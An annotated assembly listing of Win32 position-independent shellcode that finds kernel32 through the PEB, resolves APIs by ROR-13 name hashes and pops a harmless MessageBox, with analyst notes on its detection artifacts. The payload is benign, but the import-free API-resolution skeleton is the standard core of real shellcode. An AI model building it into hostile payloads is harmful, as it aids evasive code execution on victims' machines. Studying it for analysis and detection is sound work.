;-----------------------------------------------------------------------
; Win32 (x86, MASM syntax) position-independent shellcode sample.
; Behaviour visible in this listing:
;   1. Locates kernel32's image base by walking TEB -> PEB -> Ldr ->
;      InInitializationOrderModuleList (fs:[30h] -> +0Ch -> +1Ch).
;   2. Resolves exports by hashing every name in a module's Export
;      Name Table with a ROR-13 rolling hash and comparing against the
;      two precomputed constants below (LoadLibrary_Hash, MessageBox_Hash).
;   3. Builds the string "user32" on the stack, loads user32 via the
;      resolved LoadLibrary entry, then resolves and calls MessageBox.
; Analyst notes (detection-relevant artifacts of this pattern):
;   - Direct TEB/PEB access through fs:[030h] instead of imports.
;   - ROR-13 hash loop and the two 32-bit hash constants as literals.
;   - Strings assembled from immediates ("32", "user") rather than .rodata.
;   - No import table, no relocations: everything is ebp-relative.
; Register roles (steady state):
;   ebp = base of the module currently being searched
;   esi = cursor over the hash list pushed at _shellcode+7
;   edi = write cursor for resolved function addresses (grows via stosd)
; Assumptions that are not guaranteed across Windows versions:
;   - the 2nd entry of the init-order module list is kernel32
;     (NOTE(review): this holds on older releases; on newer ones another
;     DLL can occupy that slot — confirm for the target build).
;-----------------------------------------------------------------------
HashKey equ 13                         ; rotate amount of the ROR-13 name hash
LoadLibrary_Hash equ 0EC0E4E8Eh        ; ROR-13 hash of the export name to resolve first
MessageBox_Hash equ 0BC4DA2A8h         ; ROR-13 hash of the export name to resolve second
nop                                    ; leading padding
nop
nop
_shellcode:
assume fs : nothing                    ; let MASM emit fs-relative addressing
mov eax, fs : [030h]                   ; eax = PEB (TEB+30h)
mov eax, [eax + 0Ch]                   ; eax = PEB->Ldr
mov esi, [eax + 01Ch]                  ; esi = Ldr->InInitializationOrderModuleList.Flink
lodsd                                  ; eax = second list entry (see assumption above)
mov ebp, [eax + 08h] ;ebp = kernel32 base addr (entry->DllBase)
; Hash list, consumed in push order by lodsd at find_lib_func:
;   [esp]   = LoadLibrary_Hash   (resolved first, from kernel32)
;   [esp+4] = MessageBox_Hash    (resolved second, from user32)
push MessageBox_Hash
push LoadLibrary_Hash
mov esi, esp                           ; esi -> hash list
lea edi, [esp - 08h]                   ; edi -> slots just below the list; resolved pointers land here
xor ebx, ebx ;\
mov bh, 04h ; > reserve 1 KiB (ebx = 0400h) of stack below the hash list and pointer slots
sub esp, ebx ;/
;push a pointer to "user32" onto stack
mov bx, 03233h                         ; bytes 33h 32h = "32", upper half of ebx is still zero -> "32\0\0"
push ebx
mov ebx, 072657375h                    ; bytes 75h 73h 65h 72h = "user"
push ebx                               ; stack now holds "user32\0\0"
push esp                               ; lpLibFileName argument for the LoadLibrary call below
;get kernel32 base addr
find_lib_func:
;esi = function hash
lodsd                                  ; eax = next hash from the list
;is need chg ebp??
; When the current hash is the MessageBox one, the first lookup has already
; run: [edi-04h] holds the resolved LoadLibrary pointer. Call it with the
; "user32" pointer pushed earlier and swap ebp so the search below runs
; against the freshly loaded user32 instead of kernel32.
cmp eax, MessageBox_Hash
jne search_dll
xchg eax, ebp                          ; eax = kernel32 base (unused by the callee), ebp = hash
call DWORD PTR[edi - 04h]              ; eax = LoadLibrary("user32") (stdcall: callee pops the argument)
xchg eax, ebp                          ; eax = hash back, ebp = user32 base
search_dll:
pushad                                 ; save all regs; eax (the hash) is then at [esp+01Ch]
;get VA of Name Table
mov ebx, [ebp + 03Ch]                  ; e_lfanew
mov ebx, [ebp + ebx + 078h] ;RVA of Export Table (DataDirectory[0])
add ebx, ebp ;VA of Export Table
mov esi, [ebx + 020h] ;RVA of Name Table (AddressOfNames)
add esi, ebp ;VA of Name Table
xor edi, edi
dec edi                                ; edi = -1 so the first inc yields index 0
next_hash:
inc edi                                ; edi = index into the name table
lodsd ;load next FUNCTION Name RVA to eax
add eax, ebp ;FUNCTION NAME VA
xor ecx, ecx                           ; ecx = running hash
hash_loop:
movzx edx, BYTE PTR [eax]              ; dl = next name byte, dh = 0
cmp dh, dl                             ; dl == 0 -> end of name
jz hash_finish
ror ecx, HashKey                       ; hash = ror(hash, 13) + byte
add ecx, edx
inc eax
jmp hash_loop
hash_finish:
cmp ecx, [esp + 01Ch]                  ; compare against the saved eax (target hash)
jnz next_hash                          ; no bounds check: loops until a name matches
find_addr:
mov eax, [ebx + 024h] ;RVA of ORD TABLE (AddressOfNameOrdinals)
add eax, ebp ;VA of ORD TABLE
mov di, [eax + edi * 2] ;             ; di = ordinal; upper 16 bits of edi assumed zero (index < 64K)
mov ebx, [ebx + 01Ch]                  ; RVA of Address Table (AddressOfFunctions)
add ebx, ebp
mov eax, [ebx + edi * 4]               ; function RVA
add eax, ebp                           ; function VA
pop edi                                ; edi = write cursor saved by pushad
stosd                                  ; store resolved address, edi += 4
push edi                               ; hand the advanced cursor back to popad
popad                                  ; eax = hash just processed, edi = advanced cursor
cmp eax, MessageBox_Hash
jnz find_lib_func                      ; keep going until the last hash has been resolved
; Rebuild "user32\0\0" on the stack and call MessageBox(0, "user32", "user32", 0)
xor ebx, ebx
mov bx, 03233h                         ; "32\0\0"
push ebx
mov ebx, 072657375h                    ; "user"
push ebx
mov eax, esp                           ; eax -> "user32"
xor edx, edx
push edx                               ; uType   = 0
push eax                               ; lpCaption
push eax                               ; lpText
push edx                               ; hWnd    = NULL
call DWORD PTR [edi - 04h]             ; [edi-4] = most recently resolved pointer (MessageBox)
; No exit path follows: after the call returns, execution continues into
; whatever bytes sit past the trailing padding.
nop
nop
nop